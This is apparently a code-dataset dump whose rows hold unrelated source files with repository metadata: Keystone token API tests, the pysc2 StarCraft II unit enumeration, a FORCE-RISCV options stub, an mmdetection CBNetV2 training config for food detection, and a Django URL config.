body={
'auth': {
'passwordCredentials': {
'username': username,
'password': password,
},
},
},
expected_status=200)
# ensure password doesn't leak
user_id = r.result['user']['id']
r = self.admin_request(
method='GET',
path='/v2.0/users/%s' % user_id,
token=token,
expected_status=200)
self.assertNotIn('OS-KSADM:password', r.result['user'])
def test_updating_a_user_with_an_OSKSADM_password(self):
token = self.get_scoped_token()
user_id = self.user_foo['id']
password = uuid.uuid4().hex
# update the user
self.admin_request(
method='PUT',
path='/v2.0/users/%s/OS-KSADM/password' % user_id,
body={
'user': {
'password': password,
},
},
token=token,
expected_status=200)
# successfully authenticate
self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'passwordCredentials': {
'username': self.user_foo['name'],
'password': password,
},
},
},
expected_status=200)
class RevokeApiTestCase(V2TestCase):
def config_overrides(self):
super(RevokeApiTestCase, self).config_overrides()
self.config_fixture.config(group='revoke', driver='kvs')
self.config_fixture.config(
group='token',
provider='pki',
revoke_by_id=False)
def test_fetch_revocation_list_admin_200(self):
self.skipTest('Revoke API disables revocation_list.')
def test_fetch_revocation_list_md5(self):
self.skipTest('Revoke API disables revocation_list.')
def test_fetch_revocation_list_sha256(self):
self.skipTest('Revoke API disables revocation_list.')
class TestFernetTokenProviderV2(RestfulTestCase):
def setUp(self):
super(TestFernetTokenProviderV2, self).setUp()
self.useFixture(ksfixtures.KeyRepository(self.config_fixture))
# Used by RestfulTestCase
def _get_token_id(self, r):
return r.result['access']['token']['id']
def new_project_ref(self):
return {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'domain_id': 'default',
'enabled': True}
def config_overrides(self):
super(TestFernetTokenProviderV2, self).config_overrides()
self.config_fixture.config(group='token', provider='fernet')
def test_authenticate_unscoped_token(self):
unscoped_token = self.get_unscoped_token()
# Fernet token must be of length 255 per usability requirements
self.assertLess(len(unscoped_token), 255)
def test_validate_unscoped_token(self):
# Grab an admin token to validate with
project_ref = self.new_project_ref()
self.resource_api.create_project(project_ref['id'], project_ref)
self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
project_ref['id'],
self.role_admin['id'])
admin_token = self.get_scoped_token(tenant_id=project_ref['id'])
unscoped_token = self.get_unscoped_token()
path = ('/v2.0/tokens/%s' % unscoped_token)
self.admin_request(
method='GET',
path=path,
token=admin_token,
expected_status=200)
def test_authenticate_scoped_token(self):
project_ref = self.new_project_ref()
self.resource_api.create_project(project_ref['id'], project_ref)
self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'], project_ref['id'], self.role_service['id'])
token = self.get_scoped_token(tenant_id=project_ref['id'])
# Fernet token must be of length 255 per usability requirements
self.assertLess(len(token), 255)
def test_validate_scoped_token(self):
project_ref = self.new_project_ref()
self.resource_api.create_project(project_ref['id'], project_ref)
self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
project_ref['id'],
self.role_admin['id'])
project2_ref = self.new_project_ref()
self.resource_api.create_project(project2_ref['id'], project2_ref)
self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'], project2_ref['id'], self.role_member['id'])
admin_token = self.get_scoped_token(tenant_id=project_ref['id'])
member_token = self.get_scoped_token(tenant_id=project2_ref['id'])
path = ('/v2.0/tokens/%s?belongsTo=%s' % (member_token,
project2_ref['id']))
# Validate token belongs to project
self.admin_request(
method='GET',
path=path,
token=admin_token,
expected_status=200)
def test_token_authentication_and_validation(self):
"""Test token authentication for Fernet token provider.
Verify that token authentication returns validate response code and
valid token belongs to project.
"""
project_ref = self.new_project_ref()
self.resource_api.create_project(project_ref['id'], project_ref)
unscoped_token = self.get_unscoped_token()
self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
project_ref['id'],
self.role_admin['id'])
r = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'tenantName': project_ref['name'],
'token': {
'id': unscoped_token.encode('ascii')
}
}
},
expected_status=200)
token_id = self._get_token_id(r)
path = ('/v2.0/tokens/%s?belongsTo=%s' % (token_id, project_ref['id']))
# Validate token belongs to project
self.admin_request(
method='GET',
path=path,
token=CONF.admin_token,
expected_status=200)
def test_rescoped_tokens_maintain_original_expiration(self):
project_ref = self.new_project_ref()
self.resource_api.create_project(project_ref['id'], project_ref)
self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
project_ref['id'],
self.role_admin['id'])
resp = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'tenantName': project_ref['name'],
'passwordCredentials': {
'username': self.user_foo['name'],
'password': self.user_foo['password']
}
}
},
# NOTE(lbragstad): This test may need to be refactored if Keystone
# decides to disallow rescoping using a scoped token.
expected_status=200)
original_token = resp.result['access']['token']['id']
original_expiration = resp.result['access']['token']['expires']
resp = self.public_request(
method='POST',
path='/v2.0/tokens',
body={
'auth': {
'tenantName': project_ref['name'],
'token': {
'id': original_token,
}
}
},
expected_status=200)
rescoped_token = resp.result['access']['token']['id']
rescoped_expiration = resp.result['access']['token']['expires']
self.assertNotEqual(original_token, rescoped_token)
self.assertEqual(original_expiration, rescoped_expiration)
| 35.320388 | 79 | 0.562269 |
acdfca7f426e551b8337e5133afe735efa6822e9 | 9,621 | py | Python | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Define the static list of units for SC2. Generated by bin/gen_data.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
class Neutral(enum.IntEnum):
"""Neutral units."""
AccelerationZoneLarge = 1987
AccelerationZoneSmall = 1985
BattleStationMineralField = 886
BattleStationMineralField750 = 887
BlimpMengskACGluescreenDummy = 1957
CarrionBird = 322
CleaningBot = 612
CollapsibleRockTower = 609
CollapsibleRockTowerDebris = 490
CollapsibleRockTowerDebrisRampLeft = 518
CollapsibleRockTowerDebrisRampRight = 517
CollapsibleRockTowerDiagonal = 588
CollapsibleRockTowerPushUnit = 561
CollapsibleRockTowerPushUnitRampLeft = 564
CollapsibleRockTowerPushUnitRampRight = 563
CollapsibleRockTowerRampLeft = 664
CollapsibleRockTowerRampRight = 663
CollapsibleTerranTower = 610
CollapsibleTerranTowerDebris = 485
CollapsibleTerranTowerDiagonal = 589
CollapsibleTerranTowerPushUnit = 562
CollapsibleTerranTowerPushUnitRampLeft = 559
CollapsibleTerranTowerPushUnitRampRight = 560
CollapsibleTerranTowerRampLeft = 590
CollapsibleTerranTowerRampRight = 591
Crabeetle = 662
Debris2x2NonConjoined = 475
DebrisRampLeft = 486
DebrisRampRight = 487
DestructibleBillboardTall = 350
DestructibleCityDebris4x4 = 628
DestructibleCityDebris6x6 = 629
DestructibleCityDebrisHugeDiagonalBLUR = 630
DestructibleDebris4x4 = 364
DestructibleDebris6x6 = 365
DestructibleDebrisRampDiagonalHugeBLUR = 377
DestructibleDebrisRampDiagonalHugeULBR = 376
DestructibleIce4x4 = 648
DestructibleIce6x6 = 649
DestructibleIceDiagonalHugeBLUR = 651
DestructibleRampDiagonalHugeBLUR = 373
DestructibleRampDiagonalHugeULBR = 372
DestructibleRock6x6 = 371
DestructibleRockEx14x4 = 638
DestructibleRockEx16x6 = 639
DestructibleRockEx1DiagonalHugeBLUR = 641
DestructibleRockEx1DiagonalHugeULBR = 640
DestructibleRockEx1HorizontalHuge = 643
DestructibleRockEx1VerticalHuge = 642
Dog = 336
KarakFemale = 324
LabBot = 661
LabMineralField = 665
LabMineralField750 = 666
Lyote = 321
MarauderMengskACGluescreenDummy = 1958
MedivacMengskACGluescreenDummy = 1956
MineralField = 341
MineralField750 = 483
ProtossVespeneGeyser = 608
PurifierMineralField = 884
PurifierMineralField750 = 885
PurifierRichMineralField = 796
PurifierRichMineralField750 = 797
PurifierVespeneGeyser = 880
ReptileCrate = 877
RichMineralField = 146
RichMineralField750 = 147
RichVespeneGeyser = 344
Scantipede = 335
ShakurasVespeneGeyser = 881
SiegeTankMengskACGluescreenDummy = 1960
SpacePlatformGeyser = 343
ThorMengskACGluescreenDummy = 1961
TrooperMengskACGluescreenDummy = 1955
UnbuildableBricksDestructible = 473
UnbuildablePlatesDestructible = 474
UnbuildableRocksDestructible = 472
UtilityBot = 330
VespeneGeyser = 342
XelNagaDestructibleBlocker8NE = 1904
XelNagaDestructibleBlocker8SW = 1908
XelNagaTower = 149
MineralPickup = 1680
class Protoss(enum.IntEnum):
"""Protoss units."""
Adept = 311
AdeptPhaseShift = 801
Archon = 141
Assimilator = 61
AssimilatorRich = 1994
Carrier = 79
Colossus = 4
CyberneticsCore = 72
DarkShrine = 69
DarkTemplar = 76
Disruptor = 694
DisruptorPhased = 733
FleetBeacon = 64
ForceField = 135
Forge = 63
Gateway = 62
HighTemplar = 75
Immortal = 83
Interceptor = 85
Mothership = 10
MothershipCore = 488
Nexus = 59
Observer = 82
ObserverSiegeMode = 1911
Oracle = 495
OracleStasisTrap = 732
Phoenix = 78
PhotonCannon = 66
Probe = 84
Pylon = 60
PylonOvercharged = 894
RoboticsBay = 70
RoboticsFacility = 71
Sentry = 77
ShieldBattery = 1910
Stalker = 74
Stargate = 67
Tempest = 496
TemplarArchive = 68
TwilightCouncil = 65
VoidRay = 80
WarpGate = 133
WarpPrism = 81
WarpPrismPhasing = 136
Zealot = 73
class Terran(enum.IntEnum):
"""Terran units."""
Armory = 29
AutoTurret = 31
Banshee = 55
Barracks = 21
BarracksFlying = 46
BarracksReactor = 38
BarracksTechLab = 37
Battlecruiser = 57
Bunker = 24
CommandCenter = 18
CommandCenterFlying = 36
Cyclone = 692
EngineeringBay = 22
Factory = 27
FactoryFlying = 43
FactoryReactor = 40
FactoryTechLab = 39
FusionCore = 30
Ghost = 50
GhostAcademy = 26
GhostAlternate = 144
GhostNova = 145
Hellion = 53
HellionTank = 484
KD8Charge = 830
Liberator = 689
LiberatorAG = 734
MULE = 268
Marauder = 51
Marine = 48
Medivac = 54
MissileTurret = 23
Nuke = 58
OrbitalCommand = 132
OrbitalCommandFlying = 134
PlanetaryFortress = 130
PointDefenseDrone = 11
Raven = 56
RavenRepairDrone = 1913
Reactor = 6
Reaper = 49
Refinery = 20
RefineryRich = 1943
SCV = 45
SensorTower = 25
SiegeTank = 33
SiegeTankSieged = 32
Starport = 28
StarportFlying = 44
StarportReactor = 42
StarportTechLab = 41
SupplyDepot = 19
SupplyDepotLowered = 47
TechLab = 5
Thor = 52
ThorAP = 691
VikingAssault = 34
VikingFighter = 35
WidowMine = 498
WidowMineBurrowed = 500
class Zerg(enum.IntEnum):
"""Zerg units."""
Baneling = 9
BanelingBurrowed = 115
BanelingCocoon = 8
BanelingNest = 96
BroodLord = 114
BroodLordCocoon = 113
Broodling = 289
BroodlingEscort = 143
Changeling = 12
ChangelingMarine = 15
ChangelingMarineShield = 14
ChangelingZealot = 13
ChangelingZergling = 17
ChangelingZerglingWings = 16
Corruptor = 112
CreepTumor = 87
CreepTumorBurrowed = 137
CreepTumorQueen = 138
Drone = 104
DroneBurrowed = 116
Egg = 103
EvolutionChamber = 90
Extractor = 88
ExtractorRich = 1995
GreaterSpire = 102
Hatchery = 86
Hive = 101
Hydralisk = 107
HydraliskBurrowed = 117
HydraliskDen = 91
InfestationPit = 94
InfestedTerransEgg = 150
Infestor = 111
InfestorBurrowed = 127
InfestorTerran = 7
InfestorTerranBurrowed = 120
Lair = 100
Larva = 151
LocustMP = 489
LocustMPFlying = 693
LurkerDenMP = 504
LurkerMP = 502
LurkerMPBurrowed = 503
LurkerMPEgg = 501
Mutalisk = 108
NydusCanal = 142
NydusNetwork = 95
Overlord = 106
OverlordCocoon = 128
OverlordTransport = 893
Overseer = 129
OverseerSiegeMode = 1912
ParasiticBombDummy = 824
Queen = 126
QueenBurrowed = 125
Ravager = 688
RavagerBurrowed = 690
RavagerCocoon = 687
Roach = 110
RoachBurrowed = 118
RoachWarren = 97
SpawningPool = 89
SpineCrawler = 98
SpineCrawlerUprooted = 139
Spire = 92
SporeCrawler = 99
SporeCrawlerUprooted = 140
SwarmHostBurrowedMP = 493
SwarmHostMP = 494
TransportOverlordCocoon = 892
Ultralisk = 109
UltraliskBurrowed = 131
UltraliskCavern = 93
Viper = 499
Zergling = 105
ZerglingBurrowed = 119
def get_unit_type(unit_id):
for race in (Neutral, Protoss, Terran, Zerg):
try:
return race(unit_id)
except ValueError:
pass # Wrong race.
# convert the unit_ids to a dense list so that we dont waste a
# heap of memory creating embeddings for units that dont exist
def get_unit_embed_lookup():
lookup = {}
# group neutral types together to simplify
none = 0
mineral_field = 1
rich_mineral_field = 2
vespene_field = 3
rich_vespene_field = 4
destructible = 5
collapsible = 6
unbuildable = 7
xelnagatower = 8
# add a 'no unit' so that we have something to use in our embedding layer when its a padded value
lookup[0] = none
embed_index = 9
for unit_id in list(map(int, Neutral)):
attr = Neutral(unit_id).name
if 'Mineral' in attr:
if 'Rich' in attr:
lookup[unit_id] = rich_mineral_field
else:
lookup[unit_id] = mineral_field
elif 'Geyser' in attr:
if 'Rich' in attr:
lookup[unit_id] = rich_vespene_field
else:
lookup[unit_id] = vespene_field
elif 'Unbuildable' in attr:
lookup[unit_id] = unbuildable
elif 'Destructible' in attr or 'Debris' in attr:
lookup[unit_id] = destructible
elif 'Collapsible' in attr:
lookup[unit_id] = collapsible
elif 'XelNagaTower' in attr:
lookup[unit_id] = xelnagatower
else:
lookup[unit_id] = 0
for race in (Protoss, Terran, Zerg):
for unit_id in list(map(int, race)):
lookup[unit_id] = embed_index
embed_index += 1
return lookup
| 26.431319 | 101 | 0.677788 |
acdfcac9afc59ddedae895c33637961b533590f7 | 1,549 | py | Python | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from classes.ApplicationOption import ParameterProcessor
# Define additional TRACECMP specific command line parameters
#
class TracediffRiscVCmdLineOptions(object):
cGroupName = "Trace diff RiscV related options"
cGroupDescription = "Useful TRACEDIFF options to control TRACEDIFF usage"
# "number of value arguments"
# "option name" | "additional arguments"
# | "default value" | | "help text"
# | | | | |
cOptions = []
# Used to process application specific parameters
#
class TracediffRiscVParametersProcessor(ParameterProcessor):
def __init__(self, aCmdLineOptions):
super().__init__(TracediffRiscVCmdLineOptions.cOptions, aCmdLineOptions)
# Process tracecmp control data
#
def process_tracediff_riscv_control_data(aControlData, aAppParameters):
if aAppParameters is None:
return
| 35.204545 | 80 | 0.706908 |
acdfcbcb9f2522edfd38a79fe8c282b3154ea05c | 7,966 | py | Python | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | null | null | null | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | null | null | null | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | 1 | 2021-08-19T01:03:24.000Z | 2021-08-19T01:03:24.000Z | _base_ = [
"../_base_/models/htc_without_semantic_swin_fpn.py",
# "../_base_/datasets/coco_instance.py",
"../_base_/datasets/coco_detection.py",
"../_base_/schedules/schedule_1x.py",
"../_base_/default_runtime.py",
]
model = dict(
backbone=dict(
type="CBSwinTransformer",
embed_dim=128,
depths=[2, 2, 18, 2],
num_heads=[4, 8, 16, 32],
window_size=7,
ape=False,
drop_path_rate=0.3,
patch_norm=True,
use_checkpoint=False,
),
neck=dict(type="CBFPN", in_channels=[128, 256, 512, 1024]),
roi_head=dict(
bbox_head=[
dict(
type="ConvFCBBoxHead",
num_shared_convs=4,
num_shared_fcs=1,
in_channels=256,
conv_out_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
# class food
num_classes=1,
bbox_coder=dict(
type="DeltaXYWHBBoxCoder",
target_means=[0.0, 0.0, 0.0, 0.0],
target_stds=[0.1, 0.1, 0.2, 0.2],
),
reg_class_agnostic=True,
reg_decoded_bbox=True,
# single gpu
norm_cfg=dict(type="BN", requires_grad=True),
loss_cls=dict(
type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
),
loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
),
dict(
type="ConvFCBBoxHead",
num_shared_convs=4,
num_shared_fcs=1,
in_channels=256,
conv_out_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
# class food
num_classes=1,
bbox_coder=dict(
type="DeltaXYWHBBoxCoder",
target_means=[0.0, 0.0, 0.0, 0.0],
target_stds=[0.05, 0.05, 0.1, 0.1],
),
reg_class_agnostic=True,
reg_decoded_bbox=True,
# single gpu
norm_cfg=dict(type="BN", requires_grad=True),
loss_cls=dict(
type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
),
loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
),
dict(
type="ConvFCBBoxHead",
num_shared_convs=4,
num_shared_fcs=1,
in_channels=256,
conv_out_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
# class food
num_classes=1,
bbox_coder=dict(
type="DeltaXYWHBBoxCoder",
target_means=[0.0, 0.0, 0.0, 0.0],
target_stds=[0.033, 0.033, 0.067, 0.067],
),
reg_class_agnostic=True,
reg_decoded_bbox=True,
# single gpu
norm_cfg=dict(type="BN", requires_grad=True),
loss_cls=dict(
type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
),
loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
),
],
# mask_head=[
# dict(
# type="HTCMaskHead",
# num_classes=2,
# ),
# dict(
# type="HTCMaskHead",
# num_classes=2,
# ),
# dict(
# type="HTCMaskHead",
# num_classes=2,
# ),
# ],
mask_roi_extractor=None,
mask_head=None,
),
test_cfg=dict(
rcnn=dict(
score_thr=0.001,
nms=dict(type="soft_nms"),
)
),
)
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True
)
# augmentation strategy originates from HTC
train_pipeline = [
dict(type="LoadImageFromFile"),
dict(type="LoadAnnotations", with_bbox=True, with_mask=False, with_seg=False),
dict(
type="Resize",
img_scale=[(1600, 400), (1600, 1400)],
multiscale_mode="range",
keep_ratio=True,
),
dict(type="RandomFlip", flip_ratio=0.5),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="SegRescale", scale_factor=1 / 8),
dict(type="DefaultFormatBundle"),
dict(
type="Collect",
# keys=["img", "gt_bboxes", "gt_labels", "gt_masks", "gt_semantic_seg"],
keys=[
"img",
"gt_bboxes",
"gt_labels",
],
),
]
test_pipeline = [
dict(type="LoadImageFromFile"),
dict(
type="MultiScaleFlipAug",
img_scale=(1600, 1400),
flip=False,
transforms=[
dict(type="Resize", keep_ratio=True),
dict(type="RandomFlip"),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="ImageToTensor", keys=["img"]),
dict(type="Collect", keys=["img"]),
],
),
]
dataset_type = "CocoDataset"
classes = ("음식",)
data_root = "/home/jovyan/data/filtered-food2"
anno_root = "/home/jovyan/workspace/ml_mg/json_data/"
samples_per_gpu = 1
data = dict(
workers_per_gpu=16,
samples_per_gpu=samples_per_gpu,
train=dict(
type=dataset_type,
img_prefix=data_root,
classes=classes,
ann_file=anno_root + "train_new_split.json",
# ann_file=anno_root + "datatest.json",
pipeline=train_pipeline,
),
val=dict(
type=dataset_type,
img_prefix=data_root,
classes=classes,
ann_file=anno_root + "val_new_split.json",
pipeline=test_pipeline,
),
test=dict(
type=dataset_type,
img_prefix=data_root,
classes=classes,
ann_file=anno_root + "test_new.json",
pipeline=test_pipeline,
),
)
optimizer = dict(
_delete_=True,
type="AdamW",
lr=0.0001 * (samples_per_gpu / 2),
betas=(0.9, 0.999),
weight_decay=0.05,
paramwise_cfg=dict(
custom_keys={
"absolute_pos_embed": dict(decay_mult=0.0),
"relative_position_bias_table": dict(decay_mult=0.0),
"norm": dict(decay_mult=0.0),
}
),
)
lr_config = dict(step=[16, 19])
runner = dict(type="EpochBasedRunnerAmp", max_epochs=20)
# do not use mmdet version fp16
fp16 = None
optimizer_config = dict(
type="DistOptimizerHook",
update_interval=1,
grad_clip=None,
coalesce=True,
bucket_size_mb=-1,
use_fp16=True,
)
log_config = dict(
interval=1,
hooks=[
dict(type="TextLoggerHook", reset_flag=True),
dict(
type="WandbLoggerHook",
init_kwargs=dict(
project="mmdetection",
name="htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco",
),
),
],
)
evaluation = dict( # The config to build the evaluation hook, refer to https://github.com/open-mmlab/mmdetection/blob/master/mmdet/core/evaluation/eval_hooks.py#L7 for more details.
interval=1, metric=["bbox"] # Evaluation interval
)
workflow = [("train", 1), ("val", 1)]
# workflow = [("val", 1)]
resume_from = "/home/jovyan/workspace/ml_mg/cbnetev2/work_dirs/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco/latest.pth"
# load_from = "/home/jovyan/workspace/ml_mg/cbnetev2/work_dirs/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco/latest.pth"
# pretrained
# load_from = "/home/jovyan/workspace/ml_mg/cbnetev2/checkpoints/htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.pth"
| 30.875969 | 182 | 0.543184 |
acdfcd9cd7bc78200287521697da8b3efd08056a | 768 | py | Python | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | null | null | null | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | 27 | 2020-02-12T07:55:58.000Z | 2022-03-12T00:19:09.000Z | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | 2 | 2020-02-18T01:54:55.000Z | 2020-02-21T11:36:28.000Z | """template_for_demo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
]
| 34.909091 | 77 | 0.713542 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.